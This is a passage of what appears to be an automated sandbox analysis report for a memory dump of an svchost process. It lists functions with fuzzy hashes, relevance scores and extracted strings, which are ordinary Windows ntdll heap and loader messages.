Opcode Fuzzy Hash: 105c59d8b1fba4f5bb62d25ee4f73083fd40055adccbb35d82adb2723a4352af
Instruction Fuzzy Hash: 6D91C272A006199BCB20CF59C881AFEB7B4FF49318F5941BAE814E7350DBB5D901CB91

Function 03B5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

LdrShutdownProcess, xrefs: 03B9F2CE
Process 0x%p (%wZ) exiting, xrefs: 03B9F2C7
minkernel\ntdll\ldrinit.c, xrefs: 03B9F2D8
$, xrefs: 03B5D86D
$, xrefs: 03B5D900

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 2de5429a6413c7e19788b554003fea1bb64026750f972b0966ad215e0ba95a78
Instruction ID: ee48622b09e6fa5e22943710a85464fd1e275b9e1cfa2ce6bbb8c284636f21c1
Opcode Fuzzy Hash: 2de5429a6413c7e19788b554003fea1bb64026750f972b0966ad215e0ba95a78
Instruction Fuzzy Hash: 3C51CE75A003459FDB24EFA4C5847AEBBB1FF4931CF1842BDE801AB291D774A981CB90

Function 03B276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03B8B016
Invalid heap signature for heap at %p, xrefs: 03B8B02F
, passed to %s, xrefs: 03B8B040
RtlFreeHeap, xrefs: 03B8B03F
HEAP: , xrefs: 03B8B023

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: ba6c602476b83927d655c2b5735819279445d7e74b1ea371d68215e17bced262
Instruction ID: 55bcf7810b7f18036c21f20f861df7e2055b9fa4d6f01261bc401a992c2d0590
Opcode Fuzzy Hash: ba6c602476b83927d655c2b5735819279445d7e74b1ea371d68215e17bced262
Instruction Fuzzy Hash: 2F012836118260DED23AF329940AF56BFD4DB42A7CF1841FAE0148B9A2CEA89C80C560

Function 03B470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B47C96, 03B48696
HEAP[%wZ]: , xrefs: 03B47C6D, 03B48670
HEAP: , xrefs: 03B47C7C, 03B4867F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: aa81d27ab880b062927547df0a333e93a3345e7c947c6bfe0b03ad7202aa678d
Instruction ID: eca26e5f810ae19c3abf660a2e5e5298b7d046bb075832a71862b3ab5848dfd6
Opcode Fuzzy Hash: aa81d27ab880b062927547df0a333e93a3345e7c947c6bfe0b03ad7202aa678d
Instruction Fuzzy Hash: A913BA70A006599FDB25CF68C8807A9FBF1FF48308F1881E9D859EB381DB35A945DB94

Function 03B41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 03B9588F
@, xrefs: 03B95A53
HEAP[%wZ]: , xrefs: 03B95877
HEAP: , xrefs: 03B95884

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: dd465e36da4261358e6219abee6635d2fc379d708ba30b89975eaf74f0dd0883
Instruction ID: 344c621a094bb0b7ec19364c05266f498dc2cc353e55e5cf6b4f789f36d73b0a
Opcode Fuzzy Hash: dd465e36da4261358e6219abee6635d2fc379d708ba30b89975eaf74f0dd0883
Instruction Fuzzy Hash: 0B923675E00268CFEB25CF18C840BA9B7B5EF45318F0981FAD959AB291D7349E80CF55

Function 03B4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON

Download Yara Rule

Strings

SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03B97D39
SsHd, xrefs: 03B4A885
SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03B97D56
RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03B97D03

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
API String ID: 0-2905229100
Opcode ID: 32322194b05226199efeda06d0f656c2a7be2b8327fc6d23ed8e02d71b00938c
Instruction ID: 4972f343e18bb5594b48789d8aad7c7a3476f303198c5482d68c7b8936c67072
Opcode Fuzzy Hash: 32322194b05226199efeda06d0f656c2a7be2b8327fc6d23ed8e02d71b00938c
Instruction Fuzzy Hash: FED1AD75A402199BDF24CFA8C8C0AADF7B5FF48318F1940BAE845AB351D771D881DBA4

Function 03B43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B44393, 03B445CB, 03B4486D
HEAP[%wZ]: , xrefs: 03B4436D, 03B445A5, 03B44844
HEAP: , xrefs: 03B4437C, 03B445B4, 03B44853

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 8ee349d9e9aa0ff75bcc36a5b37a00629ef5cf54ee0073a65103157efcf1393c
Instruction ID: cded4bcc8107d19efe05481592fa20a16adcadb2502bdf02863750b1ec1ef4e7
Opcode Fuzzy Hash: 8ee349d9e9aa0ff75bcc36a5b37a00629ef5cf54ee0073a65103157efcf1393c
Instruction Fuzzy Hash: 26E2CE74A002159FDB28CF69C490BAAFBF1FF49308F1881E9D849AB385D734A855DF94

Function 03B3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 03B3A3FF
6, xrefs: 03B3A3F7
LdrResFallbackLangList Enter, xrefs: 03B3A3EF
8, xrefs: 03B3A3E7

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 8694f6eff8897e55b335996faa2cc84f6daaabb6dc7b1d6ea16a41a91ed3642c
Instruction ID: 91f7ad75fb0eb2cd4f43cf56b063913047c9812cafc2996a6473dfbf8c7ac8eb
Opcode Fuzzy Hash: 8694f6eff8897e55b335996faa2cc84f6daaabb6dc7b1d6ea16a41a91ed3642c
Instruction Fuzzy Hash: 2BC177745083969FDB21CF28C044B6AB7F4FF86708F1449BAF8958B250E735DA49CB52

Function 03B40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03B954ED
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03B955AE
HEAP[%wZ]: , xrefs: 03B954D1, 03B95592
HEAP: , xrefs: 03B954E0, 03B955A1

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 4d33d6c232e3d7875335b3563468fcdc79b2f8611cd347dd1d014ca74054d2bc
Instruction ID: a3f87d46c712c1f9c140cf059da936dce4581cd4ac145a8efb2d4efa2dda045d
Opcode Fuzzy Hash: 4d33d6c232e3d7875335b3563468fcdc79b2f8611cd347dd1d014ca74054d2bc
Instruction Fuzzy Hash: C6A1F434A04205DFDB24EF28C84077AFBE5EF45308F1885FAD99A8B642D734E844DB95

Function 03B6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 03B628D8
SXS: %s() passed the empty activation context, xrefs: 03BA21DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03BA21D9, 03BA22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03BA22B6

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 62b95032385feb7b326d0b1a400ed3720ffaab2c736b160c9abd54c55de71f8b
Instruction ID: aa6b0654238806f107b4c6fb3aa39c95a8860f0b759e141aa12de2252677ebd7
Opcode Fuzzy Hash: 62b95032385feb7b326d0b1a400ed3720ffaab2c736b160c9abd54c55de71f8b
Instruction Fuzzy Hash: 03A18F35D056299BDB24CF64CC84BA9B3B5FF58318F1849F9D848AB292D7349E80CF90

Function 03B2F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03B8E3FE
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03B8E563
`, xrefs: 03B8E428
HEAP: , xrefs: 03B8E54E

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 55014da608e45fd8403059a889a496dbe01e28a41088fe63cdfb84dfdba3ea91
Instruction ID: eb9b6bde7d5a4b9e7f1f834d057cfc38a4897b0152a5a4ce886290992071b8a5
Opcode Fuzzy Hash: 55014da608e45fd8403059a889a496dbe01e28a41088fe63cdfb84dfdba3ea91
Instruction Fuzzy Hash: 85610476204740AFD722EB28C844F6BBBE9EF84718F0805F8F9598B291D734D941CB62

Function 03BE11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 03BE12D6
HEAP[%wZ]: , xrefs: 03BE123D, 03BE12B7
HEAP: , xrefs: 03BE124A, 03BE125D, 03BE125F, 03BE12C4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 03BE1261

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: c7494dabb2049eb3a842557ab289400067e2ec3518fc7ddaf260a1ef06cd4537
Instruction ID: db77efddd2699698c09e6cf14bae53ecd94fb1d4529855f9de75a04d8cb2e28f
Opcode Fuzzy Hash: c7494dabb2049eb3a842557ab289400067e2ec3518fc7ddaf260a1ef06cd4537
Instruction Fuzzy Hash: 55318B35A00210EFD725DB9CCC85F6AB7E8EF0566CF2801E5E415DB2A1DB74E840DA65

Function 03B29148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualProtect Failed 0x%p %x, xrefs: 03B8BABA
HEAP[%wZ]: , xrefs: 03B8BAA0, 03B8BADD
VirtualQuery Failed 0x%p %x, xrefs: 03B8BAF7
HEAP: , xrefs: 03B8BAAD, 03B8BAEA

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 2ab13376a35e78b2e1acb5bf563ea7c2cc50bd871fcfde942ee5933e371c1e5b
Instruction ID: a51237620287604e35eea2211a20cc5797625c35293f0cd05c5e83b0cca07673
Opcode Fuzzy Hash: 2ab13376a35e78b2e1acb5bf563ea7c2cc50bd871fcfde942ee5933e371c1e5b
Instruction Fuzzy Hash: CA319636A00214EFCB11DB56C885FDEBFB9EF45A28F1441F5E428AB291DB74ED40CA61

Function 03B429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03B43255
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03B4327D
HEAP: , xrefs: 03B43264

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: fd1c032c8916c29c628e48b0149fe8576288f7560c8289008fae71c5bec78dda
Instruction ID: 2f1c04b0f0ce2a1120a1db9aa9381266177acbb41b634f586aa2e35b086156f7
Opcode Fuzzy Hash: fd1c032c8916c29c628e48b0149fe8576288f7560c8289008fae71c5bec78dda
Instruction Fuzzy Hash: FB92BD74A042499FDB25CF68C4407AEBBF1FF48308F1884E9E899AB391D735A941EF54

Function 03B41F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B4216B, 03B95E68, 03B96016, 03B96160
HEAP[%wZ]: , xrefs: 03B42155, 03B95E46, 03B95FF4, 03B9613E
HEAP: , xrefs: 03B4212E, 03B95E53, 03B96001, 03B9614B

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: a358ba4934888d322d5dbb8438273701c2ba28faa8587bc88bb4884981ef0103
Instruction ID: a2a4d8efc8093937e3d344ca2a8f9abb2101a8a13d73c5f95d1ae7cf2117bcc8
Opcode Fuzzy Hash: a358ba4934888d322d5dbb8438273701c2ba28faa8587bc88bb4884981ef0103
Instruction Fuzzy Hash: 8822CE706006559FEB26DF28C494B7AFBB5EF06708F1885FAE4598F282D735E881CB50

Function 03B40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03B950AE
(UCRBlock->Size >= *Size), xrefs: 03B950CA
HEAP: , xrefs: 03B950BD

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 99d699225392be0e813cdc11c97173ad5803c47c8174168417069f99b42a7440
Instruction ID: 22fb2a23a446f55a83755e45fe84cb75b2fd546c7bf515ac27947d7c2eb2657b
Opcode Fuzzy Hash: 99d699225392be0e813cdc11c97173ad5803c47c8174168417069f99b42a7440
Instruction Fuzzy Hash: 99F1AA34A00605DFEB25EF68C980B6AF7B5FB45308F1881FAE5169B381D734E981DB94

Function 03B31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03B31728
HEAP[%wZ]: , xrefs: 03B31712
HEAP: , xrefs: 03B31596

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: dd41f8b324aef0063bbeb43d54d57a7c54815ad15ed4b952bcac1752f271eb78
Instruction ID: 8ad6b30853b3cdaaeb45a8b8e88abfb6a49232455625a56113e2a261d52f0d1a
Opcode Fuzzy Hash: dd41f8b324aef0063bbeb43d54d57a7c54815ad15ed4b952bcac1752f271eb78
Instruction Fuzzy Hash: 12E1FF74A042619BDB29EF6CC441B7ABBF9EF46308F1885F9E496CB245E734E840CB50

Function 03B3B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 03B3B714
LdrResGetRCConfig Enter, xrefs: 03B3B702
MUI, xrefs: 03B3B6D8, 03B3B7E7

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 3d32f013db8593d17fcdec1bee8f4022b4e7120e17672db02567f975be92c67a
Instruction ID: 87d3c485ed817d100cef042d1ea7def039d159acea73d50c03b58fbeab35b0c3
Opcode Fuzzy Hash: 3d32f013db8593d17fcdec1bee8f4022b4e7120e17672db02567f975be92c67a
Instruction Fuzzy Hash: 86B17A7AA046149BEF25CF69C880BADB7F6EF45318F1985FAE455EB384D730A840CB50

Function 03BB368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 03BB3842
DelegatedNtdll, xrefs: 03BB36CE
@, xrefs: 03BB389F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: f879d5e1fad5e763855f148d5cbbdac4bd695cc22448413f2fbc67febe628cce
Instruction ID: 74a1decedb60f6e3a4e79854c5e6691fd4b3a0555365915f9cd8c24ca334caf4
Opcode Fuzzy Hash: f879d5e1fad5e763855f148d5cbbdac4bd695cc22448413f2fbc67febe628cce
Instruction Fuzzy Hash: D9B1AE7A604341AFD721EE55C880FABB7F8EB44718F1509B9F9559B250DBB0EC04CB92

Function 03B56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 03B56C24
, xrefs: 03B9CA51

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 12ffbe55be822b7e523ec172287004cbc33a8aeffaf5a94cd48e240cc866920a
Instruction ID: c32f1329de6fa35dfcb3dbf6c80cf5b6b6a929a6e15b5dd2fc90d063fdb37528
Opcode Fuzzy Hash: 12ffbe55be822b7e523ec172287004cbc33a8aeffaf5a94cd48e240cc866920a
Instruction Fuzzy Hash: FBC24F716083419FEB25CF24C881BABBBE5EF88758F0889BDF98987251D734D805CB52

Function 03B2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 03B8C2E6
\??\, xrefs: 03B8C1E4
UseFilter, xrefs: 03B2A1C1

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 1aedf3cf525fbcb0615d478c94cb61a7c8f8177c74b182c86694b10e215d4804
Instruction ID: b5c28464f103566b22b563ac3e047e5873d13cae45ff8ba42f47b809fe0602ee
Opcode Fuzzy Hash: 1aedf3cf525fbcb0615d478c94cb61a7c8f8177c74b182c86694b10e215d4804
Instruction Fuzzy Hash: 89A15C759016299BDB31EF24CC88BAAFBB8EF44708F1401E9E909AB250D7359E85CF50

Function 03BC36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

@, xrefs: 03BC3867
LdrpResMapFile Enter, xrefs: 03BC3715
LdrpResMapFile Exit, xrefs: 03BC3727

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: 0ede1cd71de818cfe32e5f8105c1b934dff0bd394704b81ae5e913308c08998f
Instruction ID: e26ebde2c93bc0c4420e5419fc2ad7ac82d7b5f7b0584f314b8deb9fe84cc829
Opcode Fuzzy Hash: 0ede1cd71de818cfe32e5f8105c1b934dff0bd394704b81ae5e913308c08998f
Instruction Fuzzy Hash: D181BD79618380AFD321DB14C844F6AB7E8FF84758F4889BDB9999B390D778D804CB52

Function 03B6909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

%, xrefs: 03BA5D3F
&, xrefs: 03BA5CF8
@, xrefs: 03B69148

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: a78fa4513ce1efbdd8c2ed4db966b0752cfa11bff13c3f4918450df34786a34e
Instruction ID: 5b4a1390090ad1b73586835d01d82ae71cfc33a39fdd53ddde502ac0dd47ef76
Opcode Fuzzy Hash: a78fa4513ce1efbdd8c2ed4db966b0752cfa11bff13c3f4918450df34786a34e
Instruction Fuzzy Hash: FD71C0746087019FC724DF24C580A2BBBE9FF8571CF1449BEE49A8B252D734D905CB92

Function 03C0B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03C0B82A
GlobalizationUserSettings, xrefs: 03C0B834
TargetNtPath, xrefs: 03C0B82F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 50f709b39ccbdab873a171f0c1e4297712cfd1feae02590af79a3a875811b913
Instruction ID: 01724a14e76d6107fdfab28bb01a1e01f194c1a5a2029acb4812bdeef80fadc6
Opcode Fuzzy Hash: 50f709b39ccbdab873a171f0c1e4297712cfd1feae02590af79a3a875811b913
Instruction Fuzzy Hash: 4E617E76D41269ABDB31DF54DC88BDAB7B8AF14714F0101E5A948EB290CB74DE80CFA0

Function 03B2F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03B8E6A6
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03B8E6C6
HEAP: , xrefs: 03B8E6B3

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: fdda16da35c8c88deec6ef080483c9449aaf4f232b50c5c0d4159b6120dd0631
Instruction ID: bf8c4ec7582da63d71ddc6b8021d8cc6850364d6282b5e7a76310d8b4c5c4e83
Opcode Fuzzy Hash: fdda16da35c8c88deec6ef080483c9449aaf4f232b50c5c0d4159b6120dd0631
Instruction Fuzzy Hash: D651C335604754EFD722EBA8C884BAAFBF8EF05308F0801F5E9558B692D774E950CB11

Function 03BDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 03BDDC12
Heap block at %p modified at %p past requested size of %Ix, xrefs: 03BDDC32
HEAP: , xrefs: 03BDDC1F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 010dcf27472b77de1bd358a0a07ffb87c0ad339271185b06351fb3ccd460bfd1
Instruction ID: 2e0fd0e31cd8e11de5bf934effd70799883c68be2c3fd5aa449291bf4d349c75
Opcode Fuzzy Hash: 010dcf27472b77de1bd358a0a07ffb87c0ad339271185b06351fb3ccd460bfd1
Instruction Fuzzy Hash: 2C5121352006508EE774DB2AC844772B7E2EF4524CF0888FEE4D6CB685F676E802DB20

Function 03B6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 03BA82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 03BA82DE
Failed to reallocate the system dirs string !, xrefs: 03BA82D7

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: b76d12a4ce8674d3544b4f30e678680ca4af9334fa1ab224d935d5b692e92c28
Instruction ID: fdc7bea60079ae282ca88e13655ebe494b99023e80756c386b5c9526f3bad121
Opcode Fuzzy Hash: b76d12a4ce8674d3544b4f30e678680ca4af9334fa1ab224d935d5b692e92c28
Instruction Fuzzy Hash: 124104B5515704ABC720FB68D840B6B7BE8EF44758F0449BAF988DB251EB74EC10CBA1

Function 03B616CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 03BA1B40
